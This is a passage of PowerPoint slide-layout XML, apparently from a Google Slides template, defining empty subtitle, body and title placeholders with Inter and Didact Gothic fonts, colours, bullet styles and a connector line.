              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3621488" y="1623731"/>
            <a:ext cx="1901100" cy="579900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6010350" y="1623731"/>
            <a:ext cx="1901100" cy="579900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="800">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3607875" y="2421525"/>
            <a:ext cx="1928100" cy="1981500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-304800" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-304800" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-304800" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5996738" y="2421525"/>
            <a:ext cx="1928100" cy="1981500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-304800" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-304800" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-304800" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="730497"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Google Shape;125;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
